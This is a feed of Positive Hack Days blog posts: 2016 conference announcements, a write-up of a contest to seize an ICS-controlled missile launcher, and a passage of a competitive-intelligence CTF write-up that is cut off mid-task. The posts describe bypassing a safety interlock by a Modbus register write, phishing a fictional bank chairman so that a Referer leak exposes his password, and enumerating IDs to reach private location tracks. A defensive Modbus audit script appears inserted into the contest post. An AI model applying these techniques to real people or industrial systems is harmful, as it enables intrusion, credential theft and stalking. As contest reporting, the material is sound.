tag:blogger.com,1999:blog-51767717947895026092021-10-06T00:20:52.525+03:00Positive Hack DaysThe Positive Hack Days — international forum on practical information security.Unknownnoreply@blogger.comBlogger165125tag:blogger.com,1999:blog-5176771794789502609.post-4907529176357088182016-02-17T13:59:00.000+03:002016-02-17T13:59:09.716+03:00Introducing PHDays VI Reports: How to Hack a Fare Card, Set Up a Honeypot, and Sell Vulnerabilities<div dir="ltr" style="text-align: left;" trbidi="on"><div class="separator" style="clear: both; text-align: center;"><a href="https://4.bp.blogspot.com/-1CG8NX3WOkc/VsQX5hLxQfI/AAAAAAAAFmM/9DvoiqqTu6k/s1600/86249db050f3ad31fff08baa8c0d104a.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="426" src="https://4.bp.blogspot.com/-1CG8NX3WOkc/VsQX5hLxQfI/AAAAAAAAFmM/9DvoiqqTu6k/s640/86249db050f3ad31fff08baa8c0d104a.jpg" width="640" /></a></div><br />On January 31, the first wave of applications to join Positive Hack Days was completed. The forum on information security will take place on May 17 and 18, 2016, at the Moscow World Trade Center. If you want to take part in the forum, you can apply in the near future: the second wave of <a href="http://www.phdays.com/call_for_papers/">Call for Papers</a> will hit on February 17 and will last till March 31.<br /><br />For now, we will announce the first participants enrolled in the Tech program. PHDays attendees will learn how to snatch a large sum at Microsoft and test transport systems security with a smartphone, and know the ins and outs of the zero-day vulnerability market.<br /><a name='more'></a><br /><b><span style="font-size: large;">Honeypot</span></b><br /><br />Terrence Gareau, a recognized expert in DDoS attack mitigation, prevention, and recovery, will make his debut at PHDays. He will outline how to develop a honeypot network and produce a data feed that can be used to protect online assets with Kibana, Elasticsearch, Logstash, and AMQP. 
Terrence Gareau will open-source a monitoring system (a project his team has been developing for the last two years) for reflective DDoS statistics that are external to any specific network.<br /><br /><b><span style="font-size: large;">Reward chasers, or Who is who in the exploit market</span></b><br />Alfonso De Gregorio, the founder of BeeWise and a principal security researcher at secYOUre, will speak at the international forum for the second time. He will continue the topic of the <a href="https://www.youtube.com/watch?v=I7nIyV-zBNY&list=PLEl1NAXHTFNzlKjae0e_-lIktpPeTRR7e&index=37">previous talk</a>, exploit selling. Alfonso will speak about the vulnerability supply chain's participants, zero-day exploit brokers, and the ethical questions that arise in the business.<br /><br /><b><span style="font-size: large;">How to make a lifelong travel card</span></b><br /><br />Matteo Beccaro, an Italian security researcher, will talk about transportation security, fraud, and technological failures. The speaker will cover some severe vulnerabilities in real-world transportation systems based on NFC technologies and introduce an open-source application designed to pentest such systems via a smartphone. The talk will attract both professional and amateur pentesters.<br /><br /><b><span style="font-size: large;">Web application security with JavaScript</span></b><br /><br />Client-side JavaScript injection may be used to detect and prevent various attacks, search for vulnerable client components, detect leakage of data about web app infrastructure, and find web bots and malicious tools. The Positive Technologies experts Denis Kolegov and Arseny Reutov will show how to ensure application security with JavaScript and share their own injection detection methods that employ syntax analyzers without signatures or filtering regular expressions. 
They will also discuss the implementation of a client-side JS honeypot to capture SSRF, IDOR, command injection, and CSRF attacks.<br /><br /><b><span style="font-size: large;">How to snatch a large sum at Microsoft </span></b><br /><br />Until recently, Microsoft refused to launch a bug bounty program despite the fact that it had become a customary practice for its competitors. Now, however, Microsoft pays researchers for certain types of vulnerabilities from USD 100 up to USD 100,000. Several recent exciting changes to the Microsoft Bounty Program include the competitive aspect of listing out its Top 100 finders.<br /><br />Jason Shirk, the principal security strategist for MSRC, will explain how the MSRC works with researchers, what bounties are available, and what other rewards can be earned. He will also uncover some secrets behind big bounties that have been paid.<br /><br />The complete list of reports will be available on the PHDays official site in April. To participate for free, you can <a href="http://www.phdays.com/call_for_papers/">present your report</a> on information security or take part in one of the forum's hacking contests or in the cyberpunk short-story competition. You can also buy a ticket to get to PHDays. Starting from February 15, the price for the full 2-day conference registration will be 9,600 rubles and 7,337 rubles for one day. 
On March 1, the cost will go up to 14,400 and 9,600 rubles respectively.</div>

2015-12-18T17:01:00.002+03:00 Tickets For PHDays VI Are Now Available<div dir="ltr" style="text-align: left;" trbidi="on"><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-4AxWi6dFLPI/VnQRft3OSTI/AAAAAAAAFkQ/d5Mh4xI02k4/s1600/7a2d03ccca783b6558ee2e6f4cd4dd1e.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="426" src="http://1.bp.blogspot.com/-4AxWi6dFLPI/VnQRft3OSTI/AAAAAAAAFkQ/d5Mh4xI02k4/s640/7a2d03ccca783b6558ee2e6f4cd4dd1e.jpg" width="640" /></a></div><br />Tickets for the international forum on information security Positive Hack Days VI are available for purchase from December 17. We are keeping last year’s prices till mid-January. A two-day ticket costs 7,337 rubles before January 30.<br /><br />You can register and buy a ticket on the RUNET-ID <a href="http://runet-id.com/event/phdays16/">Registration</a> page. From January 31, the price will rise: a ticket for two days will cost 9,600 rubles, and 7,337 rubles for a one-day pass.<br /><br />From March 1, the cost will rise to 14,400 rubles for two days and 9,600 rubles per day.<br /><a name='more'></a><br /><b><span style="font-size: large;">Other ways to participate in PHDays</span></b><br /><br />There are <a href="http://www.phdays.com/how_to_join/">several other ways</a> to join PHDays VI. You can present a report on information security. The first stage of <a href="http://www.phdays.com/call_for_papers/">Call for Papers</a> lasts till January 30. The review board considers applications not only from acknowledged information security experts, but also from newcomers. 
Before you apply, please consider the <a href="http://www.phdays.com/call_for_papers/">forum's concept, topics</a>, and <a href="https://www.youtube.com/playlist?list=PLEl1NAXHTFNzlKjae0e_-lIktpPeTRR7e">previous presentations</a>.<br /><br />You can also get an invitation by proving yourself in one of the <a href="http://2015.phdays.com/program/contests/">hacking contests</a>. Moreover, anyone can organize their own PHDays forum in their town: check out the PHDays Everywhere <a href="http://www.phdays.com/registration/everywhere/">registration terms</a>.<br /><br />4,000 hackers, information security specialists, IT vendors, researchers, government representatives, and internet privacy defenders are expected to gather at PHDays VI on May 17 and 18, 2016. The event will take place at the Moscow World Trade Center (Krasnopresnenskaya naberezhnaya, 12).<br /><br />Buy tickets at: <a href="http://runet-id.com/event/phdays16">runet-id.com/event/phdays16</a>.<br /><br />More information about PHDays VI: <a href="http://phdays.com/">phdays.com</a></div>

2015-12-03T16:14:00.000+03:00 Speak About Your Cyberwar at PHDays VI <div dir="ltr" style="text-align: left;" trbidi="on">Positive Hack Days VI, the international forum on practical information security, opens <a href="http://www.phdays.com/call_for_papers/">Call for Papers</a> on December 3, 2015. 
Our international <a href="http://www.phdays.com/program/review-board/">program committee</a> consisting of very competent and experienced experts will consider every application, whether from a novice or a recognized expert in information security, and select the best proposals.<br /><br /><a href="http://3.bp.blogspot.com/-aJNPBot25N0/VmGRlvsk5mI/AAAAAAAAFis/S3oTWFF3g8Y/s1600/7a2d03ccca783b6558ee2e6f4cd4dd1e.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="426" src="http://3.bp.blogspot.com/-aJNPBot25N0/VmGRlvsk5mI/AAAAAAAAFis/S3oTWFF3g8Y/s640/7a2d03ccca783b6558ee2e6f4cd4dd1e.jpg" width="640" /></a><br /><br />Now, more than ever before, cybersecurity specialists are being asked to stop sitting on the fence and choose a side — competitive intelligence vs DLP systems; security system developers vs targeted cyberattacks; cryptographers vs reverse engineers; hackers vs security operations centers. A <a href="http://www.phdays.com/press/news/43550/">new concept</a> of PHDays VI is designed to show what the current vibe is in information security.<br /><a name='more'></a><br />We want researchers to speak about the real dangerous threats and possible consequences. We also expect developers and integrators to give real answers to these threats rather than to talk about empowering security technologies. Come and share your experience at PHDays VI in Moscow, May 17 and 18, 2016.<br /><div class="separator" style="clear: both; text-align: center;"><br /></div>Your topic can revolve around any modern infosec field: new targeted attacks against SCADA, new threats to medical equipment, vulnerabilities of online government services, unusual techniques to protect mobile apps, antisocial engineering in social networks, or what psychological constitution SOC experts have. 
In addition, this year we are planning to discuss IS software design, development tools, and SSDL principles.<br /><br />Our key criterion is that your research should be unique and offer a fresh perspective on hacking, modern information technologies, and the role they play in our lives.<br />If you have something interesting or surprising to share, but none of the formats suits your participation, please apply anyway and be sure we will consider your work.<br /><br />The first stage of CFP ends on January 31, 2016. Apply now — the number of final reports is limited.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-cVaht5hKaL0/VmGRrA07fdI/AAAAAAAAFi0/ZlqzlAnmDvQ/s1600/86249db050f3ad31fff08baa8c0d104a.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="426" src="http://1.bp.blogspot.com/-cVaht5hKaL0/VmGRrA07fdI/AAAAAAAAFi0/ZlqzlAnmDvQ/s640/86249db050f3ad31fff08baa8c0d104a.jpg" width="640" /></a></div><br />In 2015, the forum brought together 3,500 participants. 
In 2016, it is expected to see 4,000 attendees: information security leaders, CIOs and CISOs of the world's largest companies, top managers of major banks, industrial and oil and gas producing enterprises, telecoms, and IT vendors, and representatives from various government departments.<br /><br />Positive Hack Days has featured a variety of distinguished participants, including Bruce Schneier (the legendary cryptography expert), Whitfield Diffie (one of the inventors of asymmetric cryptography), Mohd Noor Amin (IMPACT, UN), Natalya Kasperskaya (CEO of InfoWatch), Travis Goodspeed (a reverse engineer and wireless enthusiast from the U.S.), Tao Wan (the founder of China Eagle Union), Nick Galbreath (Vice-President of IPONWEB), Mushtaq Ahmed (Emirates Airline), Marc Heuse (the developer of Hydra, Amap, and THC-IPV6), Karsten Nohl (a specialist in GSM engineering), Donato Ferrante and Luigi Auriemma (famous SCADA experts from Italy), and Alexander Peslyak (the creator of the password cracking tool John the Ripper).<br /><br />Find any details about the format, participation rules, and CFP instructions on the PHDays website: <a href="http://www.phdays.com/call_for_papers/">http://www.phdays.com/call_for_papers/</a><br /><div><br /></div></div>

2015-07-09T15:43:00.000+03:00 Hot Cyberwar. 
Hackers and Missile Launchers<div dir="ltr" style="text-align: left;" trbidi="on"><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-tfudsLv4gPs/VZ5q0UuiqGI/AAAAAAAAFUY/Mf70WoI6lKQ/s1600/d671aa5e313d4143a5e26ded2abd2b55.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="472" src="http://4.bp.blogspot.com/-tfudsLv4gPs/VZ5q0UuiqGI/AAAAAAAAFUY/Mf70WoI6lKQ/s640/d671aa5e313d4143a5e26ded2abd2b55.jpg" width="640" /></a></div><br />The most spectacular contest during PHDays V was the one organized by Advantech. The contest's participants had to gain control over an industrial system that controlled a missile launcher and hit a certain secret target.<br /><a name='more'></a><br /><b><span style="font-size: large;">General</span></b><br /><br />A missile launcher on a turret rotating about two axes, and a target, were presented on a stand. The contest's participants had to gain control over the industrial system, turn the launcher toward the target, and hit it (breaking the equipment would not count).<br /><br />According to the contest's scenario, a hacker had bypassed the external perimeter and had access to the office network segment. Those who connected to the network received the operator's login and password and could watch the system in operation. The IP addresses of all the stand's devices were listed in a table on the stand.<br /><br />This year's format combined various competitions and capture the flag contests (for more information see <a href="http://blog.phdays.com/2015/05/making-money-on-cyberwar.html">our blog</a>). 
About 40 PHDays attendees and several CTF teams took part in the contest.<br /><br /><b><span style="font-size: large;">Technical details</span></b><br /><br />The SCADA system was deployed on the panel PC Advantech TPC-1840WP and was running on Windows 7 Ultimate without any additional protection systems.<br /><br />The operating system's updates were installed, Windows firewall was up. The SCADA system was implemented on Advantech WebAccess 8.0.<br /><br />Since the software could contain unpatched vulnerabilities, the operator's access was limited to visualization of the processes that go on in the controller. The controller's tags were read-only, and rewriting them didn't affect the equipment's operation. With administrator privileges, the attacker could access the page containing description of the system's structure and intrinsic addressing.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-u13pYFfQWps/VZ5rQlC8GgI/AAAAAAAAFUg/_L6njkFRttQ/s1600/2d691879400843049b7c83efa5106d60.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="428" src="http://4.bp.blogspot.com/-u13pYFfQWps/VZ5rQlC8GgI/AAAAAAAAFUg/_L6njkFRttQ/s640/2d691879400843049b7c83efa5106d60.JPG" width="640" /></a></div><br />Interconnection between the SCADA system and the PLC was maintained via Modbus TCP with the use of pseudoregisters (reading not from I/O modules, but from the controller's program memory ).<br /><br />In standard mode, client and administrator web access to the SCADA system is available via Internet Explorer through HTML4 using IIS, which is part of a standard Windows distribution kit. By default, authentication is performed by the SCADA system itself.<br /><br />The physical connection between the SCADA system and the PLC was provided by the L2 managed switch Advantech EKI-7659C with the use of common Fast Ethernet. 
The connection for contestants went through the same switch, by wire via an EKI-4654R or over Wi-Fi via an EKI-6351. The switch was not configured for VLANs or MAC address filtering, though it could have been. In addition, the laptop used for managing the stand was connected to the same subnetwork.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-rar0_3rrYdM/VZ5ralMnz1I/AAAAAAAAFUo/cdew4-JYSBI/s1600/698e2a4b296b40e4b99f1c39ff0d5017.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="428" src="http://2.bp.blogspot.com/-rar0_3rrYdM/VZ5ralMnz1I/AAAAAAAAFUo/cdew4-JYSBI/s640/698e2a4b296b40e4b99f1c39ff0d5017.JPG" width="640" /></a></div><br />PLC functions were implemented by the PAC controller Advantech APAX-5620KW, a device based on an ARM processor running WinCE 5. The controller rotated the missile launcher on a timer (for our purposes, it ran the technological program of the process). For this purpose, the softlogic kernel ProConOS (by KW Software) ran as a kernel-level task. The movement program was implemented by the developer in ladder logic using KW Multiprog. 
The cycle time was 50 ms.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-WpEPHQMLfl8/VZ5rjNBm12I/AAAAAAAAFUw/wWi9pP2yKDs/s1600/c90e0d7bc41a4f66b69f176dba50c258.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="360" src="http://4.bp.blogspot.com/-WpEPHQMLfl8/VZ5rjNBm12I/AAAAAAAAFUw/wWi9pP2yKDs/s640/c90e0d7bc41a4f66b69f176dba50c258.jpg" width="640" /></a></div><br />The controller had three standard connection methods: via VGA and USB (unavailable to contestants); via remote desktop (password-protected); and via an IEC 61131 development system, which allowed controlling and debugging the softlogic subsystem.<br /><br />The controller had two LAN ports: one connected to the SCADA system (the office subnetwork) and the other to the input/output modules (the field subnetwork). The ports had addresses in different subnetworks, which provided both load balancing and separation of access.<br /><br />For input/output, ADAM-6050 modules (discrete input from the axes' end-position sensors) and ADAM-6260 modules (relay control) were used. These modules support distributed programming in GCL, which is how the emergency protection was implemented: when an axis hit an end stop, the DI module reported it to the DO module, and the DO module reversed the appropriate motor for 3 seconds. A watchdog that disabled all outputs in case of communication loss was also configured. 
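The SCADA system above polls the controller's pseudoregisters over Modbus TCP, the contestants' segment is meant to be read-only, and the emergency protection can only be defeated by a register write from inside the field subnetwork. Modbus carries no authentication, so the practical control for a defender is to know which hosts may issue write function codes and to alert on every other write, and on malformed frames. The following Python is an added example, not code from Advantech or from the contest organizers; the IP addresses, unit ids and register addresses are constructed for illustration, and the classification covers all the standard read and write function codes rather than only the single register write the text mentions.

```python
import struct
from dataclasses import dataclass
from typing import Iterable, List, Optional, Set, Tuple

# Public Modbus function codes (from the Modbus application protocol spec).
READ_FUNCTIONS = {1, 2, 3, 4}
WRITE_FUNCTIONS = {5, 6, 15, 16, 22, 23}  # 23 (read/write multiple) also writes
FUNCTION_NAMES = {
    1: "Read Coils", 2: "Read Discrete Inputs",
    3: "Read Holding Registers", 4: "Read Input Registers",
    5: "Write Single Coil", 6: "Write Single Register",
    15: "Write Multiple Coils", 16: "Write Multiple Registers",
    22: "Mask Write Register", 23: "Read/Write Multiple Registers",
}


@dataclass
class ModbusRequest:
    transaction_id: int
    unit_id: int
    function_code: int
    start_address: Optional[int]  # first coil/register addressed, if the PDU has one


def parse_modbus_tcp(frame: bytes) -> ModbusRequest:
    """Parse one Modbus/TCP request: 7-byte MBAP header followed by the PDU."""
    if len(frame) < 8:
        raise ValueError("frame too short for MBAP header plus function code")
    tid, proto, length, unit = struct.unpack(">HHHB", frame[:7])
    if proto != 0:
        raise ValueError(f"unexpected MBAP protocol id {proto}")
    # The length field counts unit id + PDU, i.e. everything after the first 6 bytes.
    if length != len(frame) - 6:
        raise ValueError("MBAP length field does not match frame size")
    fc = frame[7]
    start = None
    if fc in (READ_FUNCTIONS | WRITE_FUNCTIONS) and len(frame) >= 10:
        start = struct.unpack(">H", frame[8:10])[0]
    return ModbusRequest(tid, unit, fc, start)


def audit_requests(packets: Iterable[Tuple[str, bytes]],
                   write_allowed_hosts: Set[str]) -> List[str]:
    """Return one alert per request that violates the read-only policy."""
    alerts: List[str] = []
    for src, frame in packets:
        try:
            req = parse_modbus_tcp(frame)
        except ValueError as err:
            alerts.append(f"{src}: malformed Modbus/TCP frame ({err})")
            continue
        name = FUNCTION_NAMES.get(req.function_code, "unknown")
        if req.function_code in WRITE_FUNCTIONS and src not in write_allowed_hosts:
            alerts.append(
                f"{src}: write function {req.function_code} ({name}) to unit "
                f"{req.unit_id} address {req.start_address} from a host that may only read")
        elif req.function_code not in (READ_FUNCTIONS | WRITE_FUNCTIONS):
            alerts.append(f"{src}: unusual function code {req.function_code}")
    return alerts


def build_request(tid: int, unit: int, fc: int, address: int, value: int) -> bytes:
    """Build a request with the 5-byte PDU layout shared by function codes 1-6."""
    pdu = struct.pack(">BHH", fc, address, value)
    mbap = struct.pack(">HHHB", tid, 0, len(pdu) + 1, unit)
    return mbap + pdu


# Constructed sample traffic; hosts and addresses are illustrative, not the stand's real map.
SCADA_HOST = "10.0.1.20"        # office-side SCADA server: reads only
ENGINEERING_HOST = "10.0.1.50"  # the one host permitted to write
WRITE_ALLOWED_HOSTS = {ENGINEERING_HOST}
SAMPLE_PACKETS = [
    (SCADA_HOST, build_request(1, 1, 3, 0x0000, 10)),        # poll 10 holding registers: fine
    (SCADA_HOST, build_request(2, 1, 6, 0x0010, 1)),         # write register 16 := 1: alert
    ("10.0.1.77", build_request(3, 1, 5, 0x0001, 0xFF00)),   # unknown host forces a coil: alert
    (ENGINEERING_HOST, build_request(4, 1, 6, 0x0010, 0)),   # allowed host writes: no alert
    ("10.0.1.99", struct.pack(">HHHB", 5, 1, 6, 1) + struct.pack(">BHH", 3, 0, 1)),  # bad protocol id
]


def audit_sample() -> List[str]:
    return audit_requests(SAMPLE_PACKETS, WRITE_ALLOWED_HOSTS)


if __name__ == "__main__":
    for line in audit_sample():
        print(line)
```

Run against the sample traffic this yields three alerts: the SCADA host writing a register, the unknown host forcing a coil, and the frame with a non-zero protocol id; the engineering host's write passes. In a real deployment the same classification would be fed from a span port or the PLC's own logs, and the allowlist would be the short list of engineering workstations, which is exactly the separation the organizers recommend in their conclusions.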
The interlock on the missile actuator control unit could be bypassed by writing a logical 1 to a separate internal variable (which required performing a Modbus register write from within the internal subnet).<br /><br />The modules were physically connected without an external switch, using the daisy-chain capability of the ADAM-6260.<br />The launcher's turret was powered by a separate 5 VDC unit and was equipped with three motors (rotation about the vertical and horizontal axes, and rocket launch). A relay circuit was used to reverse the rotary motors and as a first level of protection against short circuits in the power unit. In addition, the rocket launcher was equipped with five ground-pressure end-position sensors (left, right, up, down, volley fired).<br /><br />Almost all the components of the system used non-dictionary (generated) passwords of 8–10 characters that included Latin uppercase and lowercase letters, digits, and punctuation marks.<br /><br /><b><span style="font-size: large;">The battle</span></b><br /><br />The contest lasted for the two days of Positive Hack Days.<br /><br /><b>Day 1</b><br /><br />During the first day, contestants mostly examined the external subnet's structure and tried to attack the system via SCADA. 
The hackers disabled operating system services, including the firewall, managed to add a new user (without administrator privileges, though), and restarted the PC twice.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-hxJJFgN3Zh8/VZ5ru3plHWI/AAAAAAAAFU4/5IJYPR5RARM/s1600/fa6a139c2e764c7482a5f33f3e1b4eab.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="424" src="http://4.bp.blogspot.com/-hxJJFgN3Zh8/VZ5ru3plHWI/AAAAAAAAFU4/5IJYPR5RARM/s640/fa6a139c2e764c7482a5f33f3e1b4eab.jpg" width="640" /></a></div><br />Several participants managed to obtain administrator access to WebAccess by using Windows and SCADA exploits, looked through tag descriptions, and had the opportunity to stop the system's kernel. However, the system did not react to attempts to rewrite tags, and the kernel restarted automatically via Windows Scheduler. At the end of the day the hackers, exhausted, left an autograph on a page of the system and postponed further efforts till the next morning.<br /><br /><b>Day 2</b><br /><br />During the first half of the second day, the contest's participants searched for the source of the control signals. One of the participants found an exploit for WinCE 5, but was not able to use it.<br /><br />At 2 p.m. a hint was given: the controller's external segment is read-only, so you could try to "bypass" the controller.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-heDESuOEuRk/VZ5r36PPD3I/AAAAAAAAFVA/gQHE77-Qvfg/s1600/298deb48e0e84b83b3f36f295eb206bf.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="360" src="http://2.bp.blogspot.com/-heDESuOEuRk/VZ5r36PPD3I/AAAAAAAAFVA/gQHE77-Qvfg/s640/298deb48e0e84b83b3f36f295eb206bf.jpg" width="640" /></a></div><br />At this point RDot (a CTF team) joined. 
Within an hour and a half the team managed to access the APAX-5620 remote desktop, which gave them the ability to "kill" and launch the softlogic task and manipulate network adapters.<br /><br />One of the contestants claimed to have achieved unidirectional forwarding from LAN1 to LAN2 without receiving return packets. However, Modbus did not allow this to be used for destructive purposes.<br /><br />At 3 p.m. some mechanical problems occurred on the stand. The contestants gained the opportunity to intercept packets between KW Multiprog and the controller (stopping and restarting the controller, enabling debug mode, using the force function on controller memory cells). However, the contestants did not use this information.<br /><br />At 4 p.m. participants were provided with the program source code of the APAX and ADAM modules, which could help in discovering ways to exploit the regular programs. RDot was noted for successfully reading the program back from the controller (this function in KW Software was not password-protected), turning on debug mode, and monitoring the controller's registers.<br /><br />At 5 p.m. participants were admitted to the internal network; they launched a DDoS attack against the emergency protection system and tried to disable it.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/--Tzxk19QFA4/VZ5sANTcRII/AAAAAAAAFVI/Bz8q0-mn3Uo/s1600/4652bf103b3c4871a8b4ab76fa0a7207.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="428" src="http://4.bp.blogspot.com/--Tzxk19QFA4/VZ5sANTcRII/AAAAAAAAFVI/Bz8q0-mn3Uo/s640/4652bf103b3c4871a8b4ab76fa0a7207.JPG" width="640" /></a></div><br />The contest ended at 6 p.m. 
No one managed to stop the GCL program or to gain control over the outputs, although there were signs of impact on the modules' firmware.<br /><br />Prize winners were determined by the points they scored:<br /><ul style="text-align: left;"><li>1st place: Artur G. from the team RDot (for hacking the APAX remote desktop and successful work with the source code in IEC 61131),</li><li>2nd place: Pavel I. (the first to gain administrator access to the SCADA system's interface),</li><li>3rd place: Alexander Y. (for sending packets between the APAX controller's ports and for persistent effort).</li></ul>Consolation prize: Alexey P. (for using social engineering methods: finding a SCADA project backup on the administrator's laptop and obtaining the administrator password).<br /><br />The contest's organizers concluded that:<br /><ul style="text-align: left;"><li>Most intruders do not know much about ICS specifics. Participants mainly performed generic attacks (against ports) or used methods that did not match the system's features (monitoring Modbus traffic via Wireshark). However, it is possible to study the system's structure and its normal operation.</li><li>The most vulnerable components are those closest to the operator interface: SCADA client input and remote desktops. For systems based on Windows, additional software is required to protect both computers (firewalls) and communication channels (encryption).</li><li>An enterprise bus and a fieldbus must be physically isolated from each other, at least by a device with two network cards. 
Using VLANs is not always effective because of vulnerabilities in the web interfaces of switches.</li></ul></div>

2015-07-08T16:44:00.000+03:00 Writeup: Competitive Intelligence Contest at PHDays V<div dir="ltr" style="text-align: left;" trbidi="on"><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-Dz91_74OAmk/VZ0e2dag5wI/AAAAAAAAFPI/NPL7lQ0659c/s1600/400f04920bb4fdfe707cd237ff6912df.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-Dz91_74OAmk/VZ0e2dag5wI/AAAAAAAAFPI/NPL7lQ0659c/s1600/400f04920bb4fdfe707cd237ff6912df.png" /></a></div>This year, the participants of Competitive Intelligence included not only the contest’s usual fans but also CTF teams, so we adjusted difficulty levels accordingly. In addition, we allowed team play on one condition: a person could not participate both individually and as part of a CTF team. That is why we reached a mutual agreement to disqualify the player who scored the most — <b>azrael</b>.<br /><br />All the contests revolved around a fictional state — the United States of Soviet Unions (USSU). The Competitive Intelligence participants had to look for info about company employees with USSU citizenship. Meanwhile, the players were free to answer five questions regarding five different organizations. Within one block, you could open new questions only after answering the previous ones. (<i>One team even managed to find a right answer using brute force, but failed to advance after that – they just didn’t have enough info.</i>)<br /><a name='more'></a><br /><b><span style="font-size: large;">1. 
Find out dinner location of Bank of Snatch (snatch-bank.phdays.com)’s Chairman/Get any info you can on him.</span></b><br /><br /><i>You had to find all the info available about the Chairman of Bank of Snatch.</i><br /><br /><b>1.1.<span class="Apple-tab-span" style="white-space: pre;"> </span>Get his email address.</b><br />It’s quite easy in the beginning, actually — just get the Chairman’s email. Google already did that for you — it cached several pages of snatch-bank.phdays.com, including the one with financial documentation.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-cBT9cl-6LRg/VZ0ffo34_9I/AAAAAAAAFPQ/jSsbDI_Hydw/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="640" src="http://1.bp.blogspot.com/-cBT9cl-6LRg/VZ0ffo34_9I/AAAAAAAAFPQ/jSsbDI_Hydw/s640/1.png" width="578" /></a></div><br />The document’s metadata clearly shows that the user Aldora Jacinta Artino has the email <a href="mailto:a_j.artino.bank@ussu-gov.org">a_j.artino.bank@ussu-gov.org</a>, which means that the Chairman, who goes by the name Zenon Pavlos Economides, should have an email like this: <a href="mailto:z_p.economides.bank@ussu-gov.org">z_p.economides.bank@ussu-gov.org</a>.<br /><br /><u>Correct answers: 47</u><br /><u><br /></u><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-InSu4i1xDhM/VZ0fqTHwmHI/AAAAAAAAFPY/IYvBPforJOI/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="215" src="http://1.bp.blogspot.com/-InSu4i1xDhM/VZ0fqTHwmHI/AAAAAAAAFPY/IYvBPforJOI/s320/2.png" width="320" /></a></div><u><br /></u><br /><b>1.2.<span class="Apple-tab-span" style="white-space: pre;"> </span>What is his domain account? (format: user:password)</b><br />Let’s make it a bit more challenging. This time you need to find the domain account — name and password. 
For returning players the task proves quite easy. If you send an email to the previously acquired address, you may find a not-so-subtle hint that the guy read it, which means it’s high time to try and get him to click on the link you want.<br /><br />Note: the Chairman’s browser blocked non-standard ports for web traffic, such as 1337, so just stick to 80 or 8080.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-RhM3OUyoD9c/VZ0fuSJMzJI/AAAAAAAAFPg/EPBXXepRFik/s1600/3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="257" src="http://1.bp.blogspot.com/-RhM3OUyoD9c/VZ0fuSJMzJI/AAAAAAAAFPg/EPBXXepRFik/s400/3.png" width="400" /></a></div><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-iozLCevisHM/VZ0gaHFm1VI/AAAAAAAAFPw/Kuud6ltd25c/s1600/4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="93" src="http://1.bp.blogspot.com/-iozLCevisHM/VZ0gaHFm1VI/AAAAAAAAFPw/Kuud6ltd25c/s400/4.png" width="400" /></a></div><br /> <br />After capturing the request, you will see that the email server included the Referer header in the message, which can be used to retrieve the account name and password: zenontrapeza:zenon123.<br /><br /><u>Correct answers: 17</u><br /><br /><b>1.3.<span class="Apple-tab-span" style="white-space: pre;"> </span> Finally, find out the dinner place.</b><br />As the title says. At the moment we have his alias – zenontrapeza. Let’s ask Google again. 
You are literally two clicks away from discovering the Chairman’s account of FB, which will give you another lead: our man loves to use a certain tracker.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-n5fRWqnXaXI/VZ0ghr7jQ2I/AAAAAAAAFP0/PFuf5UeDQ7k/s1600/5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="155" src="http://2.bp.blogspot.com/-n5fRWqnXaXI/VZ0ghr7jQ2I/AAAAAAAAFP0/PFuf5UeDQ7k/s400/5.png" width="400" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div>But something seems off. After performing some unsophisticated manipulations with URL and ID, you should be able to gain access to the Pavlos track file:<br /><br /><ul style="text-align: left;"><li><a href="http://sport.phdays.com/account/1045/">http://sport.phdays.com/account/1045/</a></li><li><a href="http://sport.phdays.com/achive/1045">http://sport.phdays.com/achive/1045</a></li><li><a href="http://sport.phdays.com/img/1045">http://sport.phdays.com/img/1045</a></li><li><a href="http://sport.phdays.com/img/1">http://sport.phdays.com/img/1</a>, which gave an error you could use to find the final URL —<a href="http://sport.phdays.com/kmls/track.kml?id=1045">http://sport.phdays.com/kmls/track.kml?id=1045</a></li></ul><br />Finally, we got the track we need. But here is a tough one for you – there are no GPS coordinates in it, just the mobile phone operator’s base station ID. No problem. 
